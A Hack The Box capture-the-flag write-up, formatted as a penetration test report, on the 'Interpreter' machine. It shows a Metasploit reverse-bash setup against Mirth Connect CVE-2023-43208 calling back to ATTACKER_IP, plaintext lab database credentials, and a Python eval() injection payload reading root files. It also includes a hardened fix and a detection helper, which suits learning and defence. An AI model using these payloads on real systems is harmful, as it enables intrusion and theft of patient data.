HTB - Interpreter
Mirth Connect 4.4.0 RCE via CVE-2023-43208. Database credentials reveal a Flask notification service with an eval() injection in a timestamp field that runs as root.
PENETRATION TEST REPORT
Hack The Box — Interpreter
Medium | Linux | Hack The Box
| Field | Value |
|---|---|
| Report Date | 22 February 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.2.69 |
| Hostname | N/A |
| Domain | N/A |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Interpreter. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
The attack chain was: unauthenticated RCE in Mirth Connect 4.4.0 (CVE-2023-43208) for a shell as the mirth user; database credentials recovered from mirth.properties, which exposed an HL7 channel forwarding patient records to a Flask notification service running as root; and an eval() injection in that service's timestamp field, giving code execution as root.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.2.69 |
| Hostname | N/A |
| Domain | N/A |
| Operating System | Linux |
| Machine Rating | Medium |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 22 February 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap — Mirth Connect on 80/443 | T1046 |
| Initial Access | CVE-2023-43208: Mirth Connect 4.4.0 unauthenticated RCE → shell as mirth | T1190 |
| Info Gathering | mirth.properties → DB creds → HL7 channel → notif.py Flask service on :54321 | T1552.001 |
| Privilege Escalation | eval() injection in timestamp field (notif.py runs as root) → direct flag read | T1059.006 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
| Port | Service |
|---|---|
| 80 / 443 | Mirth Connect 4.4.0 (HL7 integration engine) |
Initial Access — CVE-2023-43208 (Mirth Connect RCE)
Mirth Connect 4.4.0 is vulnerable to unauthenticated RCE (CVE-2023-43208). The Metasploit module multi/http/mirth_connect_cve_2023_43208 exploits it:
```
use multi/http/mirth_connect_cve_2023_43208
set RHOSTS 10.129.2.69
set LHOST ATTACKER_IP
set payload cmd/unix/reverse_bash
run
```
Result: uid=103(mirth) gid=111(mirth)
Information Gathering
Credentials from mirth.properties
```
/usr/local/mirthconnect/conf/mirth.properties
→ database.username = mirthdb
→ database.password = MirthPass123!
```
CHANNEL table — HL7 pipeline
The MariaDB mc_bdd_prod.CHANNEL table defines a pipeline that receives HL7v2 on TCP/6661 and forwards a parsed XML document to http://127.0.0.1:54321/addPatient as text/plain.
The XML format sent to the notification service:
```xml
<patient>
<timestamp>20240101120000</timestamp>
<sender_app>APP</sender_app>
<id>1</id>
<firstname>John</firstname>
<lastname>Doe</lastname>
<birth_date>01/01/1990</birth_date>
<gender>M</gender>
</patient>
```
Privilege Escalation — eval() Injection in notif.py
Port 54321 hosts a Flask app (notif.py) running as root. The <timestamp> field passes through a regex that permits {}, (), and ', then is interpolated directly into a Python f-string before eval():
```python
# Field values are substituted into the template first ...
template = f"Patient {first} {last} ... received from {sender} at {ts}"
# ... and the result is then parsed a second time as an f-string by eval(),
# so any {expression} left in a field is executed as Python.
return eval(f"f'''{template}'''")
```
Any {expression} in the timestamp field executes as Python code in the context of eval().
Payload (read root flag directly):
```python
import urllib.request
xml = b'''<patient>
<timestamp>{open('/root/root.txt').read()}</timestamp>
<sender_app>APP</sender_app><id>1</id>
<firstname>J</firstname><lastname>D</lastname>
<birth_date>01/01/1990</birth_date><gender>M</gender>
</patient>'''
req = urllib.request.Request(
    'http://127.0.0.1:54321/addPatient', data=xml,
    headers={'Content-Type': 'text/plain'}
)
print(urllib.request.urlopen(req).read().decode())
```
User flag: obtained by sending {open('/home/sedric/user.txt').read()} in the timestamp field.
Root flag: obtained by sending {open('/root/root.txt').read()} in the timestamp field.
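To make the root cause and the fix concrete, the following is an added example (not notif.py's code and not part of the original report). It parses the patient XML shown above, reproduces the interpolate-then-eval pattern with a permissive pattern of the kind the report describes, and places a hardened renderer beside it that validates the timestamp as exactly 14 digits and never re-evaluates the string. The regexes, field names beyond those on the page, and the `is_suspicious` check are assumptions made for illustration; the probe value is a harmless constructed expression.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the document the Mirth channel forwards to /addPatient,
# using the benign values from the report.
SAMPLE_XML = b"""<patient>
<timestamp>20240101120000</timestamp>
<sender_app>APP</sender_app>
<id>1</id>
<firstname>John</firstname>
<lastname>Doe</lastname>
<birth_date>01/01/1990</birth_date>
<gender>M</gender>
</patient>"""

FIELDS = ("timestamp", "sender_app", "id", "firstname", "lastname",
          "birth_date", "gender")


def parse_patient(raw: bytes) -> dict:
    """Parse the <patient> document into a dict of the seven expected fields."""
    root = ET.fromstring(raw)
    if root.tag != "patient":
        raise ValueError("unexpected root element")
    out = {}
    for name in FIELDS:
        node = root.find(name)
        if node is None or node.text is None:
            raise ValueError(f"missing field: {name}")
        out[name] = node.text.strip()
    return out


# Hypothetical reconstruction of a permissive check like the one described:
# braces, parentheses and quotes all pass, so a template expression survives.
PERMISSIVE_TS = re.compile(r"^[\w{}()'./]+$")

# Hardened check: an HL7 TS value is exactly 14 digits (YYYYMMDDHHMMSS).
STRICT_TS = re.compile(r"^\d{14}$")


def render_vulnerable(p: dict) -> str:
    """Reproduces the reported bug: substitute values, then eval the result as an f-string."""
    if not PERMISSIVE_TS.match(p["timestamp"]):
        raise ValueError("bad timestamp")
    template = (f"Patient {p['firstname']} {p['lastname']} received from "
                f"{p['sender_app']} at {p['timestamp']}")
    # Second parse: any {expression} inside a field value is executed here.
    return eval(f"f'''{template}'''")


def render_safe(p: dict) -> str:
    """Hardened form: allow-list validation, single substitution, no eval."""
    if not STRICT_TS.match(p["timestamp"]):
        raise ValueError("timestamp must be 14 digits (YYYYMMDDHHMMSS)")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", p["sender_app"]):
        raise ValueError("sender_app contains unexpected characters")
    # A plain f-string substitutes once; the values are never re-parsed.
    return (f"Patient {p['firstname']} {p['lastname']} received from "
            f"{p['sender_app']} at {p['timestamp']}")


def is_suspicious(raw: bytes) -> bool:
    """Detection helper for log review of /addPatient bodies: anything whose
    timestamp is not a clean 14-digit value (or that fails to parse) is flagged."""
    try:
        ts = parse_patient(raw)["timestamp"]
    except (ET.ParseError, ValueError):
        return True
    return STRICT_TS.match(ts) is None


if __name__ == "__main__":
    benign = parse_patient(SAMPLE_XML)
    print(render_safe(benign))
    # Constructed probe: a harmless expression in the timestamp field.
    probe = dict(benign, timestamp="{len('ab')}")
    print(render_vulnerable(probe))  # the expression is evaluated: "... at 2"
    try:
        render_safe(probe)
    except ValueError as err:
        print("rejected:", err)
```

The difference worth noticing is that the hardened version needs no escaping logic at all: once the timestamp is restricted to digits and the string is built by a single f-string, there is no second parse for attacker-supplied braces to reach. The `is_suspicious` check is the same rule applied retrospectively, which is the simplest detection for this endpoint.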
6. Proof of Access
| Level | Evidence |
|---|---|
| User | {open('/home/sedric/user.txt').read()} |
| Root | {open('/root/root.txt').read()} |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| See Findings | Documented inline | Mixed | Commands and evidence blocks in section 5 |
8. Impact Assessment
Successful exploitation resulted in high-impact host compromise and demonstrated practical attacker control across the full kill chain for this target.
9. Remediation Summary
| Priority | Action |
|---|---|
| High | Patch exploitable service components and remove unsafe defaults. |
| High | Restrict writable paths and high-risk ACL/delegation rights. |
| Medium | Enforce credential hygiene, rotation, and secret exposure controls. |
| Medium | Add detections for attacker tradecraft used in section 5. |
10. Key Takeaways
- Small configuration weaknesses can chain into full host compromise.
- Credential exposure and trust relationships are critical escalation multipliers.
- Reproducible testing and evidence-driven reporting improve remediation quality.
11. Tools Used
| Tool | Purpose |
|---|---|
| nmap | Used during enumeration/exploitation workflow. |
| metasploit | Used during enumeration/exploitation workflow. |
| mysql | Used during enumeration/exploitation workflow. |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Interpreter | RobInTheHood | 22 February 2026